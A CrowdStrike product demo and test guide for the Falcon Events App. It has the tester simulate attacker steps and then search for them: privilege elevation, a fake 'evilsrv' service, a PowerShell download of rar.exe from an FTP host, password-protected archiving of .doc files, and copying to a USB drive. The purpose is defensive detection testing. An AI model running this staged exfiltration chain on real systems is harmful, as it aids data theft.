Visibility is an essential element in next generation endpoint protection. While legacy endpoint security products were limited to either blocking or allowing an activity, next generation endpoint protection products add the ability to record activity on the endpoint and store it in a database for future search and investigation. While this may sound simple, there are actually vast differences in the way that this can be implemented.
CrowdStrike delivers superior visibility as a result of its unique architecture. The key points to know about this architecture are:
- The Falcon sensor does more than just record and store events. It puts events in context. It is trivial to simply record events and dump them into a database. This creates a garbage-in-garbage-out scenario for admins that ends up wasting time and driving up infrastructure costs. The Falcon sensor takes a different approach. It actually links related events together to paint an accurate picture of the state of the machine. It then displays that picture to the admin (rather than a stream of unrelated events). Understanding individual events as part of a broader sequence of events allows the sensor to then apply security logic derived from CrowdStrike intelligence. If a sequence of events matches a known indicator of attack, the Falcon sensor will identify the activity as malicious, send a detection alert to the administrator and also block the threat.
- Events recorded by the Falcon sensor are streamed to the cloud and stored in a graph database. This approach ensures that data is accessible to the administrator even if some systems are offline at the time of the search. It also ensures speed and scalability. The CrowdStrike graph database – known as Threat Graph – is designed to return results for all queries in five seconds or less, regardless of the size or the amount of data in the database.
This architecture allows Falcon Endpoint Protection to provide deep visibility across your entire environment in five seconds or less.
How to Get Five Second Visibility Across Your Organization with Falcon Endpoint Protection
In this demo, we’d like to highlight the events app to demonstrate Falcon’s new real-time event retrieval for events and advance searches. I’ll start off by just opening a remote desktop session on a host with Falcon installed. Once I’m on a target host, I’ll open a command prompt with elevated privileges.
For this demo, I’ll run a handful of commands that are often associated with an attack just to illustrate how quickly, how granular, and just how powerful the searches in Falcon can be. I’ll start by changing directories and then running the command who am I.
In the events app in the Falcon UI, we can immediately search for these types of events. This app uses these Splunk query language for those who are familiar with Splunk. And for those who aren’t, our Intel ninjas have created a threat hunting guide with their top search recommendations. Here, we’ll simply query iOS sessions connected or remote desktop sessions launched.
And then in the search results below, we can see the session that we had just created. Since I also ran the command with elevated privileges, we can also query instances where privileges have been elevated by searching UAC exec elevation. Running this query against your organization may uncover instances where privilege escalation is being used inappropriately.
The events app allows users to search on any one of the hundreds of different events that the Falcon Center constantly captures. It’s also able to do this within minutes or even seconds of the event happening on the system. Moving back to the remote desktop session, I’m going to enter a list of commands that could easily be associated with an attack.
First, I’ll launch PowerShell in an attempt to hide all of my actions. Then, I’ll create a directory called x-fill on the desktop. To illustrate the breadth of searchable commands, I’ll create a service called evil service that starts the ping.exe application, perhaps, to check a connectivity to one of my CNC servers. Once that is successful, I’ll download a ZIP utility using a connection to my FTP server. In this case, rar.exe and that will allow me to ZIP and encrypt any documents I’d like to take and, hopefully, DLP detection.
Then, finally, I’ll connect an external USB drive and copy the ZIP files to it. A quick inspection in Explorer shows the zipped file and the mounted E drive. While an attacker probably wouldn’t copy something to a local drive, this is something an insider with malicious intent might do.
In this example, I’ve mimicked a number of techniques that are often used once an attacker finds their way into an organization. Oftentimes, if an attacker has gotten this far, your AV has been of little use. Falcon and the events app is a powerful tool for discovering threats or behavior that appear suspicious from either an internal or external actor. Using the PE file written command, we can see the rar.exe file was created.
Using a command search, such as FS volume mounted, can show us that an external drive was also attached to the host. Well, each of the commands I ran could be searched individually. There’s also a powerful search argument that can be used in the events app, the command history argument. Typing command history for a single host will list all the commands associated with a recent attack for the selected time period.
In the search results below, we can easily see each command and get a clear picture of what happened to the owned endpoint. In fact, further inspection, we can even see the passwords used to encrypt the documents. And then towards the end, we can see that they were copied to the E drive.
This is just a small example of how powerful and granular the advanced search capabilities are in the events app. And all this can be done in just a few seconds using Falcon.
In order to proceed, the following requirements must be met:
- Client operating system: Windows 7 SP1 or higher (and server equivalents), Mac OS X Yosemite or higher, RHEL or CenOS 6 or higher, Ubuntu 14.04
- Two Windows test systems with the Falcon sensor installed
- Steps 8 and later require an FTP server and usage of a RAR utility
The purpose of these use cases is to illustrate what events are recorded by the Falcon sensor and to show the speed at which those events can be searched from the Falcon Events App. These use cases represent a tiny subset of the events that are recorded and made searchable. Please contact us to learn about all of our visibility and search capabilities.
Go to CrowdStrike Falcon Endpoint Protection Login Page and login
Navigate to Events App
Switch to Test System 1 and start Remote Desktop connection to Test System 2. This remote connection will be recorded.
You can search for this activity in the events app by entering the following search: ComputerName=hostname IoSessionConnected
The results will show that the connection occurred and also provide contextual details of the connection.
Return to the RDP session and choose to run the Windows Command Prompt as Administrator. When prompted, choose Yes to the User Account Control (UAC) prompt.
Return to the Events App and enter the following search: ComputerName=hostname UACExeElevation
The results will show that CMD started, but it will also show the contextual events around the execution along with the details of the UAC elevation.
Return to the RDP session and type “whoami” in the Windows Command Prompt
Go back to the Events App and enter the following search: ComputerName=hostname whoami
The results show that the Falcon sensor can not only see that CMD started, but that it can also see all command activity. Similarly, you can search for activity by user with the following search: ComputerName=hostname UserIdentity
Return to the RDP session and type “powershell” in the Windows Command Prompt. If we execute the next few commands from PowerShell within a Windows Command Prompt, then many of the activities will be obfuscated (a common attacker technique). However, Falcon can see through this obfuscation technique.
In CMD change directory to the desktop and then type “mkdir exfil”
This creates a folder for us to stage data that we will later attempt to exfiltrate.
Go back to the Events App and enter the following search: ComputerName=hostname DirectoryCreate
We can immediately see the creation of the new directory.
Return to the RDP session. In CMD change directory to the exfil directory. Then type: New-Service -name evilsrv -DisplayName “Evil Service” -BinaryPathName C:\Windows\System32\PING.EXE
Go back to the Events App and enter the following search: ComputerName=hostname CreateService
The results tell us that a service was created, but it also shows us all of the context around the service. For example, it also tells us that its purpose is to launch PING.EXE.
THE FOLLOWING STEPS REQUIRE AN FTP SERVER AND A RAR UTILITY
Return to the RDP session. Download a RAR utility from an FTP server in CMD with a command like: Invoke-WebRequest -uri ftp://ftpserver/Rar.exe -OutFile rar.exe
Go to Events App and see that the RAR utility was written with the following search: ComputerName=hostname PeFileWritten
Return to the RDP session. Add all .doc files to a RAR archive and password protect it in CMD with a command like: .\rar.exe a -hpPassword ..\*.doc
Go to Events App and see that the data was archived with the following search: ComputerName=hostname RarFileWritten You can also get the details of the archive utility with the following search: ComputerName=hostname rar.exe
The critical thing to know about this data preparation phase is that it was all done inside an existing PowerShell process. This obfuscation technique makes the FTP and RAR activity invisible to most tools, but Falcon can still see it. In fact, Falcon can even detect when an attacker tries to hide an archive file by giving it a benign extension like .txt. This is true because Falcon doesn’t simply look at the file extension; instead, it looks at the entire sequence of events and can see that an archiving utility was used to create the file before it was renamed to .txt (for example).
Falcon can also see removable media activity. To proceed, insert removable media to your test system or mount removable media to your VM. Go to Events App and see that removable media was mounted with the following search: ComputerName=hostname FsVolumeMounted
To continue our data exfiltration example, go to CMD and type: copy .\exfil.rar e:\
This copies the archived data to the removable media device. To see this in the Events App, return to the events app and type the following search: ComputerName=hostname CommandHistory
These search results include all commands executed on the system. This is a quick and easy way to see attacker activity because they typically prefer to use command line interfaces. In this example, you can see the entire attack chain summarized in one simple event.
CrowdStrike Falcon Endpoint Protection makes it quick and easy to get visibility across your entire organization. The solution is SaaS-based and built on a graph database. This means that administrators get unlimited scalability without any need to invest in on-premise hardware. More importantly, it means that administrators can always get immediate responses to their queries – regardless of deployment size. This document showed a small subset of the events that Falcon captures, and also showed how quickly they can be searched for in the Events App. CrowdStrike is continually adding additional visibility features, so please contact us for the latest information.